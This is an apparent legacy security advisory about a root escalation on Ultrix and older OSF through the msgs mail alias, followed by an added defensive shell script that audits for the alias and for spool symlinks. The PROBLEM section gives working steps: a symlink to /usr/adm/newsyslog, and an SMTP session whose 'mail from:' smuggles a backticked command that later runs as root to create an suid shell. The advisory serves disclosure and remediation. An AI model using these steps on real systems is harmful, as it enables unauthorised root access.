COMMAND

SYSTEMS AFFECTED

    Ultrix, older OSF; it should also work on any system that has the
    msgs mail alias.

PROBLEM

        $ grep msgs /etc/aliases
        msgs: "|/usr/ucb/msgs -s"

    Ok, the first thing to do is look in the /usr/msgs directory (or
    whatever directory the msgs files are kept in), and see what the
    next msgs file will be (if there is a 1 and a 2, the next one is
    pretty easy to figure out).

    Then make an executable /tmp/a that makes an suid shell (this is
    pretty easy to do; if you can't do it, don't consider yourself a
    hacker).

    By default, newsyslog runs every 6 days at 4 am, but that depends
    on the crontab setup. What it does is age the syslog file (at
    /usr/adm/syslog.1, .2, ..., I think).

    symlink /usr/msgs/<nextmsg> -> /usr/adm/newsyslog
    $ telnet
    telnet> open localhost 25

    (SMTP greeting banner: mailer name, version, etc.)

    expn msgs
    250 <"| /usr/ucb/msgs -s">
    mail from: <`/tmp/a`>
    rcpt to: msgs
    data
    doesn't matter what you put here
    .
    quit

    So now, when it  writes to /usr/msgs/<nextmsg>, it will  overwrite
    /usr/adm/newsyslog,  and  since  /usr/adm/newsyslog  is  a   shell
    script,  it  will  expand  `/tmp/a`  by  executing /tmp/a AS ROOT,
    giving you an suid shell or whatever /tmp/a does.

SOLUTION

    Remove the msgs alias from /etc/aliases.
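An audit and remediation helper for the two conditions this hack relies on (a program alias for msgs in /etc/aliases and a symlink planted in the msgs spool), added here and not part of the original text. It takes the aliases file and spool directory as parameters and assumes only a POSIX shell with grep and readlink.

```shell
#!/bin/sh
# Added audit helper, not from the original text. Checks an aliases file for
# the msgs program alias and a msgs spool directory for symlinks, and writes a
# copy of the aliases file with the msgs alias removed. Paths are parameters;
# /etc/aliases and /usr/msgs are the locations named in the text.

# True (exit 0) when FILE defines a "msgs:" alias.
has_msgs_alias() {
    grep -Eq '^[[:space:]]*msgs[[:space:]]*:' "$1"
}

# Print every alias in FILE whose target is a program ("|..."); true if any.
find_pipe_aliases() {
    grep -v '^[[:space:]]*#' "$1" | grep -E '^[^:]+:[[:space:]]*"?[|]'
}

# Print symlinks found in the spool DIR (the spool should hold regular files
# only, so any symlink there is suspect); true if at least one was found.
find_spool_symlinks() {
    found=1
    for f in "$1"/* "$1"/.*; do
        [ -L "$f" ] || continue
        printf '%s -> %s\n' "$f" "$(readlink "$f")"
        found=0
    done
    return $found
}

# Write FILE to OUT with the msgs alias line dropped. After replacing the
# real file, run newaliases so the alias database is rebuilt.
remove_msgs_alias() {
    grep -Ev '^[[:space:]]*msgs[[:space:]]*:' "$1" > "$2"
}

# Run both checks on ALIASES_FILE and SPOOL_DIR; true when nothing was found.
audit() {
    ok=0
    has_msgs_alias "$1" && { echo "msgs alias present in $1"; ok=1; }
    find_spool_symlinks "$2" && ok=1
    return $ok
}
```

Source the file and run `audit /etc/aliases /usr/msgs`; a non-zero exit means at least one of the preconditions is present.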